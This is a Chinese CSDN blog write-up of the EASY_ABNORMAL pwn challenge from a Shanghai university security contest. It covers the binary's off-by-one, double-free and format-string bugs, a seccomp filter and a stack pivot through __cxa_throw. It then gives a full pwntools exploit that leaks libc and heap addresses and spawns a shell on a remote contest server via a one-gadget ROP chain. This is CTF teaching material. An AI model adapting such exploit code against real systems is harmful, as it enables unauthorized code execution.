上海大学生网络安全赛 EASY_ABNORMAL

最新推荐文章于 2023-04-12 10:29:40 发布
最新推荐文章于 2023-04-12 10:29:40 发布
阅读量452 收藏
点赞数 1
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chennbnbnb/article/details/109703360
版权

程序分析

  • offset-by-one

  • double free

  • BackDoor函数

prctl的作用:

struct sock_fprog       /* Required for SO_ATTACH_FILTER. */
{
        unsigned short          len;    /* Number of filter blocks */
        struct sock_filter      *filter;
};

struct sock_filter      /* Filter block */
{
        __u16   code;   /* Actual filter code */
        __u8    jt;     /* Jump true */
        __u8    jf;     /* Jump false */
        __u32   k;      /* Generic multiuse field */
};

用IDA把sock_filter的数据导出来,然后用seccomp-tools去解析

最后发现prctl其实就是只允许write与execve的函数调用,对getshell没影响

 

  • 格式化字符串

 

思路

先找libc

直接去double发现报错了,如果是Tcache则不会报错,因此确定不是2.27的libc,只能是2.23的

再利用格式化字符串确定libc是2.23的,和lgtwo的libc一样

 

__cxa_throw()

这个函数我没看源码,直接动态调试发现,函数本身有一个栈溢出,可以控制保存的rbp值为X

进入__cax_throw之后只要X对于0x10对齐,那么就会有rbp=X,然后leave; ret,因此只要让X+8处为ROP即可

 

EXP

#! /usr/bin/python
from pwn import *
context.log_level = 'debug'
context(arch='amd64', os='linux')

#sh = process('./pwn-2')
elf = ELF('./pwn-2')
libc = ELF('./libc.so.6')

sh = remote('123.56.52.128', 10012)
#proc_base = sh.libs()[sh.cwd + sh.argv[0].strip('.')]

def Log(val):
	log.success('%s = %s'%(str(val), hex(eval(val))))

def Cmd(i):
	sh.sendlineafter('CHOICE :', str(i))

def ShowName():
	Cmd(1)

def New(cont):
	Cmd(2)
	sh.recvuntil('cnt:')
	sh.send(cont)		
	#sh.recvuntil('well! ')

def Delete(idx):
	Cmd(3)
	sh.sendlineafter('idx:', str(idx))

def Show():
	Cmd(4)

def BackDoor(cont):
	Cmd(23333)
	sh.recvuntil('INPUT:')
	sh.send(cont)

#leak libc addr
sh.recvuntil('NAME: ')
sh.send('%11$p')
ShowName()
sh.recvuntil('INFO:')
libc.address = int(sh.recvline(), 16) - 0x20840
Log('libc.address')

#ROP
ones = [0x45226, 0x4527a, 0xf0364, 0xf1207]
OGG = libc.address + ones[0]
exp = p64(0)*3
exp+= p64(OGG)

#leak heap addr
New(exp.ljust(0x61, '\x00'))
New('\x00'*0x61)
Delete(0)
Delete(1)			#Fastbin->C1->C0
Show()
sh.recvuntil('idx 2:')
heap_addr = u64(sh.recv(6).ljust(8, '\x00')) - 0x11C10
Log('heap_addr')

#begin ROP
#gdb.attach(sh, 'break *0x55555555531c')

BackDoor('A'*0x20+p64(heap_addr + 0x11C30))	#rbp, align to 0x10

sh.interactive()

'''
ShowName::printf	0x11A0
'''

 

一只狗20000402
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
面试题(4)
Superxgl的专栏
12-04 6472
第一篇笔试题目 from http //www.edu.cn 招聘考题 一 TC2.0 环境下的如下程序, 执行结果为 please input: scanf : floating point formats not linked Abnormal program termination 试解决! #include "stdio.h" #include
C++异常处理控制流下的OLLVM混淆
轻松学C语言
10-10 4643
点击蓝字关注我们来源于网络,侵删Inflated!!!C++异常化处理OLLVM-控制流平坦化Two PuzzlesException一般碰到C++异常逆向,确定了异常分发、处理部分,直接把call throw改为jmp catch块,再F5即可。PS: 多个catch块根据rdx来当为异常处理数值决定哪个为对应的catch块。关于以上,这篇讲的很详细:https://4nsw3r.top/202...
栈迁移浅析
qq_43409582的博客
11-23 3993
0x00 线下有道栈迁移的题目,因为当时没有好好学,对于栈迁移这一块儿一知半解的,就没出,痛定思痛,在此就好好研究一下。 0x01 前置知识 首先栈迁移就是因为可写空间太小不够rop,就把栈迁移到别的地方去构造payload。 而栈迁移最重要的是两个汇编命令 leave; ret; leave相对于是mov esp,ebp;pop ebp; ret是pop eip; 0x02 stack pivoting 先从32位来理解栈迁移的利用原理。 stack pivoting,正如它所描述的,该技巧就是劫持栈指针
2020全国大学生网安邀请暨第六届上海大学生网安大Misc-Writeup
末初的CSDN博客
11-15 1469
文章目录签到(Solved)pcap(Solved)pcap analysis(Solved)可乐加冰(Unsolved) 签到(Solved) {echo,ZmxhZ3t3MzFjMG1lNX0=}|{base64,-d}|{tr,5,6} Linux下直接运行即可 flag{w31c0me6} pcap(Solved) challenge2.pcapng 根据提示查看dnp3协议,以长度为排序,在长度为91的Response包中发现每个包中藏有一位flag 以此类推读完这些包的fl
2020第六届上海大学生网络安全pwn wp
qq_45595732的博客
11-26 649
2020年全国大学生网络安全邀请暨第六届上海大学生网络安全 体验一般,前三道2道原题一道常规题,cpu_emulator还挺有意思 EASY_ABNORMAL ​ 湖湘杯2020原题,修改了提示字符而已,漏洞点在于格式化字符串和c++一个异常的处理,完全可以直接调出来,在后面函数输入非法的程序就会被劫持。 ​ glibc2.23 exp from pwn import* context.log_level = 'debug' context.update(arch='amd64',os='lin
dolphinscheduler 海豚调度历史版本梳理
03-06 7797
海豚调度历史版本梳理)历史版本2.0.5-release (20220302)2.0.4-release (20220226)2.0.3-release (20220120)2.0.2-release (20211231)2.0.1-release (20211213)2.0.0-release (20211116)2.0.0-alpha (20211021)1.3.9-release (20211018)1.3.8-release (20210831)1.3.6-release (20210425)1
工作中使用到的单词(软件开发)_2023_0316备份
sun0322
03-16 1万+
目录■Java学习汇总■常用链接■2020/03/15 (最初整理 242个单词)2020 6/28 整理2020 6/29 整理2020 7/6 整理■2020 7/23 整理■2020/10/07 以降整理■2020/11/02 以降整理■2020/12/04 以降整理■2020/12/14以降整理■2021/01/01以降整理■2021/02/22以降整理■匿名内部类,lambda表达式,JDK7新特性,等等java相关■2021/03/18以降整理Linux系统性能 相关■其他各种单词,知识(l
英语每日小记
热门推荐
sulia1234567890的博客
04-12 6万+
英语
[C/C++]各种面试题
weiyinchao88
01-22 846
各种面试题 *程序的内存分配 一个由c/C++编译的程序占用的内存分为以下几个部分 1、栈区(stack)— 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等。其操作方式类似于数据结构中的栈。 2、堆区(heap) — 一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 。注意它与数据结构中的堆是两回事,分配方式倒是类似于链表,呵呵。 3、全...
matlab提升函数.zip_de-missing-abnormal_de_abnormal_deabnormal matlab
09-24
"de_abnormal_deabnormal_matlab"这一标签可能指的是异常检测和异常去除的组合策略。MATLAB中的`isoutlier()`函数可以帮助我们识别数据集中的异常值,而`rmoutliers()`则可以删除这些值。结合这些工具,用户可以构建...
de_abnormal.m
03-12
de_abnormal.m
matlab-gui.rar_abnormal detection_open_railway_railway gui_railw
09-19
Matlab program for railway abnormal detection and imaging,including GUI, open dlg, processing dlg and source code.
abnormal-events-detection2.rar_Action!_action recognition _human
07-14
2 Chaotic Invariants for Human Action Recognition
abnormal - 副本.rar_matlab_
08-10
在IT领域,尤其是在数据分析和信号处理中,"abnormal - 副本.rar_matlab_"这个标题暗示我们可能涉及到了一个使用Matlab编程环境进行异常检测的项目。Matlab是数学计算、数值分析和科学可视化的强大工具,常用于处理...
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4143
回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 2980
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2284
在libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
scanf源码分析
chennbnbnb的博客
12-02 1185
本文分析的是glibc2.31中的scanf相关源码,目的不是研究scanf的算法,而是说明scanf在IO attack中的利用方法,属于CTF的范畴 scanf.c 其实就是对__vscanf_internal的封装 __scanf (const char *format, ...) { va_list arg; int done; va_start (arg, format); done = __vfscanf_internal (stdin, format, arg, 0)
代码解析valid_abnormal_id = abnormal_id[:11]
最新发布
07-12
这段代码是Python代码,用于创建一个名为`valid_abnormal_id`的新列表,其中包含了`abnormal_id`列表的前11个元素。 假设`abnormal_id`是一个包含多个元素的列表,例如`abnormal_id = [1, 2, 3, 4, 5, 6, 7, 8, 9, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值